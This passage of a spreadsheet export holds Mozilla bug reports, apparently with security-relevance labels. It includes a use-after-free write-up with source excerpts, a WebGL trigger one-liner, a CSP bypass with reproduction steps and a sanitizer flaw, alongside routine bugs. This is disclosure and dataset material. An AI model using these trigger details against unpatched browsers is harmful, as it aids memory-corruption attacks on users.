    *aIndex += aRows.Count() - count;
  }
}
When serializing an optgroup, a new row is created. The optgroup will
then serialize it's child "option" element.
void
nsTreeContentView::SerializeOptGroup(nsIContent* aContent, PRInt32
aParentIndex,
                                     PRInt32* aIndex, nsVoidArray&amp;
aRows)
{
  Row* row = Row::Create(mAllocator, aContent, aParentIndex);
  aRows.AppendElement(row);
  row-&gt;SetContainer(PR_TRUE);
  row-&gt;SetOpen(PR_TRUE);
  nsCOMPtr&lt;nsIContent&gt; child;
  nsTreeUtils::GetImmediateChild(aContent, nsGkAtoms::option,
getter_AddRefs(child));
  if (child) {
    // Now, recursively serialize our child.
    PRInt32 count = aRows.Count();
    PRInt32 index = 0;
    Serialize(aContent, aParentIndex + *aIndex + 1, &amp;index, aRows);    
// XXX: child element
    row-&gt;mSubtreeSize += aRows.Count() - count;
  }
  else
    row-&gt;SetEmpty(PR_TRUE);
}
When an element is removed from the tree, the following code is called
to remove a row from the document. This will deallocate all the contents
of a particular row.
layout/xul/base/src/tree/src/nsTreeContentView.cpp:1051
void
nsTreeContentView::ContentRemoved(nsIDocument *aDocument,
                                     nsIContent* aContainer,
                                     nsIContent* aChild,
                                     PRInt32 aIndexInContainer)
{
layout/xul/base/src/tree/src/nsTreeContentView.cpp:1105
  else if (tag == nsGkAtoms::treeitem ||
           tag == nsGkAtoms::treeseparator ||
           tag == nsGkAtoms::option ||
           tag == nsGkAtoms::optgroup
          ) {
    PRInt32 index = FindContent(aChild);
    if (index &gt;= 0) {
      PRInt32 count = RemoveRow(index);     // XXX: remove the option
element
      if (mBoxObject)
        mBoxObject-&gt;RowCountChanged(index, -count);
    }
  }
PRInt32
nsTreeContentView::RemoveRow(PRInt32 aIndex)
{
  Row* row = (Row*)mRows[aIndex];
  PRInt32 count = row-&gt;mSubtreeSize + 1;
  PRInt32 parentIndex = row-&gt;mParentIndex;
  Row::Destroy(mAllocator, row);
  for(PRInt32 i = 1; i &lt; count; i++) {
    Row* nextRow = (Row*)mRows[aIndex + i];
    Row::Destroy(mAllocator, nextRow);          // XXX
  }
  mRows.RemoveElementsAt(aIndex, count);
  UpdateSubtreeSizes(parentIndex, -count);
  UpdateParentIndexes(aIndex, 0, -count);
  return count;
}
Upon the deallocation, the duplicate variable reference can be fetched
via the GetItemAtIndex method. Due to this reference being freed, the
contents of the option tag point to recently freed memory.
layout/xul/base/src/tree/src/nsTreeContentView.cpp:759
NS_IMETHODIMP
nsTreeContentView::GetItemAtIndex(PRInt32 aIndex, nsIDOMElement**
_retval)
{
  NS_PRECONDITION(aIndex &gt;= 0 &amp;&amp; aIndex &lt; mRows.Count(), "bad index");
  if (aIndex &lt; 0 || aIndex &gt;= mRows.Count())
    return NS_ERROR_INVALID_ARG;   
  Row* row = (Row*)mRows[aIndex];
  row-&gt;mContent-&gt;QueryInterface(NS_GET_IID(nsIDOMElement),
(void**)_retval);
  return NS_OK;
}
-- CREDIT --------------------------------------------------------------
This vulnerability was discovered by:
    * regenrecht</t>
        </is>
      </c>
      <c r="X4677" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4678">
      <c r="A4678" t="n">
        <v>1387618</v>
      </c>
      <c r="B4678" t="inlineStr">
        <is>
          <t>2017-08-04 14:44:04 -0700</t>
        </is>
      </c>
      <c r="C4678" t="inlineStr">
        <is>
          <t>Increase "Close tab" icon size with Touch density</t>
        </is>
      </c>
      <c r="D4678" t="inlineStr">
        <is>
          <t>2019-05-21 01:48:17 -0700</t>
        </is>
      </c>
      <c r="E4678" t="n">
        <v>1</v>
      </c>
      <c r="F4678" t="n">
        <v>1</v>
      </c>
      <c r="G4678" t="n">
        <v>2</v>
      </c>
      <c r="H4678" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4678" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J4678" t="inlineStr">
        <is>
          <t>Theme</t>
        </is>
      </c>
      <c r="K4678" t="inlineStr">
        <is>
          <t>57 Branch</t>
        </is>
      </c>
      <c r="L4678" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M4678" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N4678" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4678" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4678" t="inlineStr">
        <is>
          <t>[reserve-photon-visual][p3]</t>
        </is>
      </c>
      <c r="Q4678" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4678" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4678" t="inlineStr">
        <is>
          <t>Firefox 57</t>
        </is>
      </c>
      <c r="T4678" t="n">
        <v>1</v>
      </c>
      <c r="U4678" t="n">
        <v>1</v>
      </c>
      <c r="V4678" t="n">
        <v>17</v>
      </c>
      <c r="W4678" t="inlineStr">
        <is>
          <t>"Close tab" button icon size should respect "Density" preference in "Customize..." option, because for now it doesn't change like all other icons and it looks kinda huge in "Compact" density mode.
"Speedy" Regression window (mozilla-central)
Good:
https://ftp.mozilla.org/pub/firefox/nightly/2017/08/2017-08-03-10-03-52-mozilla-central/
Bad:
https://ftp.mozilla.org/pub/firefox/nightly/2017/08/2017-08-04-10-03-54-mozilla-central/
Pushlog:
https://hg.mozilla.org/mozilla-central/pushloghtml?fromchange=63e261ce8cb04c913d2e6b19ea451b7078d24dc1&amp;tochange=32083f24a1bb2c33050b4c972783f066432194eb
Probably caused by:
Bug 1385702 - Update close icon style for photon</t>
        </is>
      </c>
      <c r="X4678" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4679">
      <c r="A4679" t="n">
        <v>727547</v>
      </c>
      <c r="B4679" t="inlineStr">
        <is>
          <t>2012-02-15 11:21:24 -0800</t>
        </is>
      </c>
      <c r="C4679" t="inlineStr">
        <is>
          <t>nsIDOMWebGLRenderingContext_Tex{,Sub}Image2D use JSVAL_TO_OBJECT on arbitrary objects</t>
        </is>
      </c>
      <c r="D4679" t="inlineStr">
        <is>
          <t>2024-05-29 15:57:35 -0700</t>
        </is>
      </c>
      <c r="E4679" t="n">
        <v>1</v>
      </c>
      <c r="F4679" t="n">
        <v>1</v>
      </c>
      <c r="G4679" t="n">
        <v>3</v>
      </c>
      <c r="H4679" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4679" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4679" t="inlineStr">
        <is>
          <t>Graphics: CanvasWebGL</t>
        </is>
      </c>
      <c r="K4679" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4679" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4679" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4679" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4679" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4679" t="inlineStr">
        <is>
          <t>[sg:critical][qa!][gfx.relnote.13]</t>
        </is>
      </c>
      <c r="Q4679" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4679" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4679" t="inlineStr">
        <is>
          <t>mozilla13</t>
        </is>
      </c>
      <c r="T4679" t="n">
        <v>1</v>
      </c>
      <c r="U4679" t="n">
        <v>0</v>
      </c>
      <c r="V4679" t="n">
        <v>15</v>
      </c>
      <c r="W4679" t="inlineStr">
        <is>
          <t>Created attachment 597496
Patch v1
Something like this should do the trick:
webglcontext.texImage2D(0, 0, 0, 0, 0, { width: 10, height: 10, data: 7 })
I'd test it, but we don't support WebGL on my hardware. Code was added in bug 573705.</t>
        </is>
      </c>
      <c r="X4679" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4680">
      <c r="A4680" t="n">
        <v>1316075</v>
      </c>
      <c r="B4680" t="inlineStr">
        <is>
          <t>2016-11-08 10:08:15 -0800</t>
        </is>
      </c>
      <c r="C4680" t="inlineStr">
        <is>
          <t>make security fixes and add assertions to cover previous conversions from private browsing boolean to origin attribute</t>
        </is>
      </c>
      <c r="D4680" t="inlineStr">
        <is>
          <t>2016-12-22 16:57:57 -0800</t>
        </is>
      </c>
      <c r="E4680" t="n">
        <v>1</v>
      </c>
      <c r="F4680" t="n">
        <v>1</v>
      </c>
      <c r="G4680" t="n">
        <v>2</v>
      </c>
      <c r="H4680" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4680" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J4680" t="inlineStr">
        <is>
          <t>Private Browsing</t>
        </is>
      </c>
      <c r="K4680" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4680" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4680" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4680" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4680" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4680" t="inlineStr">
        <is>
          <t>[OA][domsecurity-active]</t>
        </is>
      </c>
      <c r="Q4680" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4680" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4680" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4680" t="n">
        <v>1</v>
      </c>
      <c r="U4680" t="n">
        <v>0</v>
      </c>
      <c r="V4680" t="n">
        <v>31</v>
      </c>
      <c r="W4680" t="inlineStr">
        <is>
          <t>This bug covers adding assertions to code that we previously converted from the private browser boolean to the origin attributes.  Specifically the work done in Bug 1276328 and in this changeset: https://hg.mozilla.org/mozilla-central/rev/34acf7fe34f4</t>
        </is>
      </c>
      <c r="X4680" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4681">
      <c r="A4681" t="n">
        <v>1730194</v>
      </c>
      <c r="B4681" t="inlineStr">
        <is>
          <t>2021-09-10 08:33:20 -0700</t>
        </is>
      </c>
      <c r="C4681" t="inlineStr">
        <is>
          <t>Prevent Copy button to send information to Cloud Clipboard and Clipboard History on Windows</t>
        </is>
      </c>
      <c r="D4681" t="inlineStr">
        <is>
          <t>2022-10-04 18:31:03 -0700</t>
        </is>
      </c>
      <c r="E4681" t="n">
        <v>1</v>
      </c>
      <c r="F4681" t="n">
        <v>1</v>
      </c>
      <c r="G4681" t="n">
        <v>2</v>
      </c>
      <c r="H4681" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4681" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J4681" t="inlineStr">
        <is>
          <t>about:logins</t>
        </is>
      </c>
      <c r="K4681" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4681" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4681" t="inlineStr">
        <is>
          <t>Windows</t>
        </is>
      </c>
      <c r="N4681" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4681" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4681" t="inlineStr">
        <is>
          <t>[sec-survey][adv-main94+][adv-esr91.3+]</t>
        </is>
      </c>
      <c r="Q4681" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4681" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S4681" t="inlineStr">
        <is>
          <t>95 Branch</t>
        </is>
      </c>
      <c r="T4681" t="n">
        <v>1</v>
      </c>
      <c r="U4681" t="n">
        <v>0</v>
      </c>
      <c r="V4681" t="n">
        <v>20</v>
      </c>
      <c r="W4681" t="inlineStr">
        <is>
          <t>Windows 10 introduced Cloud Clipboard and Clipboard History, when app uses classic clipboard API the information goes to the local clipboard and to the cloud/history as well.
This is typically not clear or known to user, so they might not understand they are copying their sensitive information to the cloud and history.
There is no known way to disable these features for the whole app, but if we add 3 clipboard formats listed here https://docs.microsoft.com/en-us/windows/win32/dataxchg/clipboard-formats#cloud-clipboard-and-clipboard-history-formats we will prevent sensitive data from going to the unexpected places.</t>
        </is>
      </c>
      <c r="X4681" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4682">
      <c r="A4682" t="n">
        <v>1443698</v>
      </c>
      <c r="B4682" t="inlineStr">
        <is>
          <t>2018-03-06 17:43:54 -0800</t>
        </is>
      </c>
      <c r="C4682" t="inlineStr">
        <is>
          <t>Fix &amp; enable ESLint var/let/const rules</t>
        </is>
      </c>
      <c r="D4682" t="inlineStr">
        <is>
          <t>2018-03-07 11:27:03 -0800</t>
        </is>
      </c>
      <c r="E4682" t="n">
        <v>1</v>
      </c>
      <c r="F4682" t="n">
        <v>1</v>
      </c>
      <c r="G4682" t="n">
        <v>7</v>
      </c>
      <c r="H4682" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I4682" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J4682" t="inlineStr">
        <is>
          <t>Treeherder: Frontend</t>
        </is>
      </c>
      <c r="K4682" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L4682" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4682" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4682" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4682" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4682" t="inlineStr"/>
      <c r="Q4682" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4682" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4682" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4682" t="n">
        <v>1</v>
      </c>
      <c r="U4682" t="n">
        <v>0</v>
      </c>
      <c r="V4682" t="n">
        <v>4</v>
      </c>
      <c r="W4682" t="inlineStr">
        <is>
          <t>To ensure new code conforms to best practices, as well as help catch things like bug 1443667.</t>
        </is>
      </c>
      <c r="X4682" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4683">
      <c r="A4683" t="n">
        <v>1680084</v>
      </c>
      <c r="B4683" t="inlineStr">
        <is>
          <t>2020-12-01 10:38:05 -0800</t>
        </is>
      </c>
      <c r="C4683" t="inlineStr">
        <is>
          <t>CSS sanitization omits trailing comment tag</t>
        </is>
      </c>
      <c r="D4683" t="inlineStr">
        <is>
          <t>2023-02-22 14:31:49 -0800</t>
        </is>
      </c>
      <c r="E4683" t="n">
        <v>1</v>
      </c>
      <c r="F4683" t="n">
        <v>1</v>
      </c>
      <c r="G4683" t="n">
        <v>3</v>
      </c>
      <c r="H4683" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4683" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4683" t="inlineStr">
        <is>
          <t>CSS Parsing and Computation</t>
        </is>
      </c>
      <c r="K4683" t="inlineStr">
        <is>
          <t>78 Branch</t>
        </is>
      </c>
      <c r="L4683" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4683" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4683" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4683" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4683" t="inlineStr">
        <is>
          <t>[adv-main84+][sec-survey][adv-esr78.6+]</t>
        </is>
      </c>
      <c r="Q4683" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4683" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S4683" t="inlineStr">
        <is>
          <t>85 Branch</t>
        </is>
      </c>
      <c r="T4683" t="n">
        <v>1</v>
      </c>
      <c r="U4683" t="n">
        <v>0</v>
      </c>
      <c r="V4683" t="n">
        <v>39</v>
      </c>
      <c r="W4683" t="inlineStr">
        <is>
          <t>nsTreeSanitizer::SanitizeStyleSheet creates an unexpected result that removes a comment closing tag.
Given this input:
```
&lt;!--
/* Font Definitions */
@font-face
	{font-family:"Cambria Math";
	panose-1:2 4 5 3 5 4 6 3 2 4;}
@font-face
	{font-family:"Yu Gothic";
	panose-1:2 11 4 0 0 0 0 0 0 0;}
@font-face
	{font-family:"Yu Gothic";
	panose-1:2 11 4 0 0 0 0 0 0 0;}
/* Style Definitions */
p.MsoNormal, li.MsoNormal, div.MsoNormal
	{margin:0mm;
	text-align:justify;
	text-justify:inter-ideograph;
	font-size:10.5pt;
	font-family:"Yu Gothic";}
span.17
	{mso-style-type:personal-compose;
	font-family:"Yu Gothic";
	color:windowtext;}
.MsoChpDefault
	{mso-style-type:export-only;
	font-family:"Yu Gothic";}
/* Page Definitions */
@page WordSection1
	{size:612.0pt 792.0pt;
	margin:99.25pt 30.0mm 30.0mm 30.0mm;}
div.WordSection1
	{page:WordSection1;}
--&gt;
```
we get this output:
```
&lt;!--
/* Font Definitions */
@font-face
	{font-family:"Cambria Math";
	panose-1:2 4 5 3 5 4 6 3 2 4;}
@font-face
	{font-family:"Yu Gothic";
	panose-1:2 11 4 0 0 0 0 0 0 0;}
@font-face
	{font-family:"Yu Gothic";
	panose-1:2 11 4 0 0 0 0 0 0 0;}
/* Style Definitions */
p.MsoNormal, li.MsoNormal, div.MsoNormal
	{margin:0mm;
	text-align:justify;
	text-justify:inter-ideograph;
	font-size:10.5pt;
	font-family:"Yu Gothic";}mso-style-type:personal-compose;
	font-family:"Yu Gothic";
	color:windowtext;}
.MsoChpDefault
	{mso-style-type:export-only;
	font-family:"Yu Gothic";}size:612.0pt 792.0pt;
	margin:99.25pt 30.0mm 30.0mm 30.0mm;}
div.WordSection1
	{page:WordSection1;}
```
The biggest issue we're facing is the omission of the close comment tag.
That would be my highest priority in this bug report, it leads to bug 1659362.
However, there is some other data corruption going on, too.</t>
        </is>
      </c>
      <c r="X4683" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4684">
      <c r="A4684" t="n">
        <v>39536</v>
      </c>
      <c r="B4684" t="inlineStr">
        <is>
          <t>2000-05-16 18:03:25 -0700</t>
        </is>
      </c>
      <c r="C4684" t="inlineStr">
        <is>
          <t>showdependencytree.cgi needs to validate "id" param</t>
        </is>
      </c>
      <c r="D4684" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:22 -0800</t>
        </is>
      </c>
      <c r="E4684" t="n">
        <v>1</v>
      </c>
      <c r="F4684" t="n">
        <v>1</v>
      </c>
      <c r="G4684" t="n">
        <v>4</v>
      </c>
      <c r="H4684" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4684" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J4684" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K4684" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4684" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M4684" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="N4684" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4684" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4684" t="inlineStr">
        <is>
          <t>security</t>
        </is>
      </c>
      <c r="Q4684" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R4684" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4684" t="inlineStr">
        <is>
          <t>Bugzilla 2.14</t>
        </is>
      </c>
      <c r="T4684" t="n">
        <v>1</v>
      </c>
      <c r="U4684" t="n">
        <v>0</v>
      </c>
      <c r="V4684" t="n">
        <v>6</v>
      </c>
      <c r="W4684" t="inlineStr">
        <is>
          <t>showdependencytree.cgi feeds an unchecked "id" parameter to the person viewing 
the page and also to the sql server.
Replace:
my $id = $::FORM{'id'};
my $linkedid = qq{&lt;a href="show_bug.cgi?id=$id"&gt;$id&lt;/a&gt;};
With:
my $id = $::FORM{'id'};
die "Invalid id: $id" unless $id =~ /^\s*\d+\s*$/;
my $linkedid = qq{&lt;a href="show_bug.cgi?id=$id"&gt;$id&lt;/a&gt;};
(i don't actually know perl.  "die" line copied from showdependencygraph.cgi.)</t>
        </is>
      </c>
      <c r="X4684" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4685">
      <c r="A4685" t="n">
        <v>670317</v>
      </c>
      <c r="B4685" t="inlineStr">
        <is>
          <t>2011-07-08 23:52:07 -0700</t>
        </is>
      </c>
      <c r="C4685" t="inlineStr">
        <is>
          <t>"ASSERTION: JS failed without setting an exception!" with setTimeout</t>
        </is>
      </c>
      <c r="D4685" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E4685" t="n">
        <v>1</v>
      </c>
      <c r="F4685" t="n">
        <v>1</v>
      </c>
      <c r="G4685" t="n">
        <v>3</v>
      </c>
      <c r="H4685" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4685" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4685" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K4685" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4685" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M4685" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N4685" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4685" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4685" t="inlineStr">
        <is>
          <t>[qa!][advisory-tracking+]</t>
        </is>
      </c>
      <c r="Q4685" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4685" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4685" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4685" t="n">
        <v>1</v>
      </c>
      <c r="U4685" t="n">
        <v>0</v>
      </c>
      <c r="V4685" t="n">
        <v>13</v>
      </c>
      <c r="W4685" t="inlineStr">
        <is>
          <t>Created attachment 544952
testcase
JavaScript error: , line 0: Permission denied for &lt;file://&gt; to call method XULElement.QueryInterface
###!!! ASSERTION: JS failed without setting an exception!: 'JS_IsExceptionPending(cx)', file js/src/xpconnect/src/xpcwrappedjsclass.cpp, line 323
Security-sensitive because there seems to be some context or privilege confusion. Did a the file: URL really get its hands on a XULElement?</t>
        </is>
      </c>
      <c r="X4685" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4686">
      <c r="A4686" t="n">
        <v>1437009</v>
      </c>
      <c r="B4686" t="inlineStr">
        <is>
          <t>2018-02-09 05:09:11 -0800</t>
        </is>
      </c>
      <c r="C4686" t="inlineStr">
        <is>
          <t>CSP is not propagated to the TriggeringPrincipal for right-click new tab,ctrl-click new tab, drag &amp; drop new tab cases</t>
        </is>
      </c>
      <c r="D4686" t="inlineStr">
        <is>
          <t>2019-02-20 07:23:08 -0800</t>
        </is>
      </c>
      <c r="E4686" t="n">
        <v>1</v>
      </c>
      <c r="F4686" t="n">
        <v>1</v>
      </c>
      <c r="G4686" t="n">
        <v>3</v>
      </c>
      <c r="H4686" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4686" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4686" t="inlineStr">
        <is>
          <t>DOM: Security</t>
        </is>
      </c>
      <c r="K4686" t="inlineStr">
        <is>
          <t>60 Branch</t>
        </is>
      </c>
      <c r="L4686" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4686" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4686" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4686" t="inlineStr">
        <is>
          <t>DUPLICATE</t>
        </is>
      </c>
      <c r="P4686" t="inlineStr">
        <is>
          <t>[domsecurity-backlog1]</t>
        </is>
      </c>
      <c r="Q4686" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R4686" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4686" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4686" t="n">
        <v>0</v>
      </c>
      <c r="U4686" t="n">
        <v>0</v>
      </c>
      <c r="V4686" t="n">
        <v>7</v>
      </c>
      <c r="W4686" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:60.0) Gecko/20100101 Firefox/60.0
Build ID: 20180206100151
Steps to reproduce:
1. click the link https://www.halesworth.net/links/list_two.php?code=3 
2. Find the link in the list with the name "Walpole Chapel". 
3. Normal click on the link from [2] will throw "Your connection is not secure" and the page will not be loaded. Because of the "upgrade-insecure-reqeusts" CSP from [1]
4. Opening the link using Right-Click new tab or ctrl-click new tab or drag-and-drop new tab will load the page without any "Your connection is not secure" error.
Actual results:
Summary of actual result: 
* right-click secure link to force top-level navigation
* the initial load is secure link
* the requests hits a 30x redirect to navigate to insecure cross-origin page
This is because the CSP is not propagated to the TriggeringPrincipal for these scenarios.
CSP object is null in the below line of code,
https://dxr.mozilla.org/mozilla-central/source/docshell/base/nsDocShell.cpp#10753
Expected results:
Expected Result:
Link should be blocked from loading for all these scenarios because of the "upgrade-insecure-reqeusts" CSP.
CSP should be propagated to the Principal for all these scenarios.</t>
        </is>
      </c>
      <c r="X4686" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4687">
      <c r="A4687" t="n">
        <v>450666</v>
      </c>
      <c r="B4687" t="inlineStr">
        <is>
          <t>2008-08-14 15:23:40 -0700</t>
        </is>
      </c>
      <c r="C4687" t="inlineStr">
        <is>
          <t>Increase intervals for long-running tests</t>
        </is>
      </c>
      <c r="D4687" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E4687" t="n">
        <v>1</v>
      </c>
      <c r="F4687" t="n">
        <v>1</v>
      </c>
      <c r="G4687" t="n">
        <v>5</v>
      </c>
      <c r="H4687" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4687" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J4687" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4687" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L4687" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4687" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4687" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4687" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4687" t="inlineStr"/>
      <c r="Q4687" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4687" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4687" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4687" t="n">
        <v>1</v>
      </c>
      <c r="U4687" t="n">
        <v>0</v>
      </c>
      <c r="V4687" t="n">
        <v>10</v>
      </c>
      <c r="W4687" t="inlineStr">
        <is>
          <t>In order to reduce the amount of data the graph server needs to store/retrieve, we need to increase the interval for long running tests.
First idea is tests that run for more than 10 minutes can have their intervals increased to once every 10 seconds?</t>
        </is>
      </c>
      <c r="X4687" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4688">
      <c r="A4688" t="n">
        <v>1390517</v>
      </c>
      <c r="B4688" t="inlineStr">
        <is>
          <t>2017-08-15 07:50:42 -0700</t>
        </is>
      </c>
      <c r="C4688" t="inlineStr">
        <is>
          <t>Speed up the Travis run</t>
        </is>
      </c>
      <c r="D4688" t="inlineStr">
        <is>
          <t>2021-12-05 14:49:36 -0800</t>
        </is>
      </c>
      <c r="E4688" t="n">
        <v>1</v>
      </c>
      <c r="F4688" t="n">
        <v>1</v>
      </c>
      <c r="G4688" t="n">
        <v>7</v>
      </c>
      <c r="H4688" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I4688" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J4688" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K4688" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L4688" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4688" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4688" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4688" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4688" t="inlineStr"/>
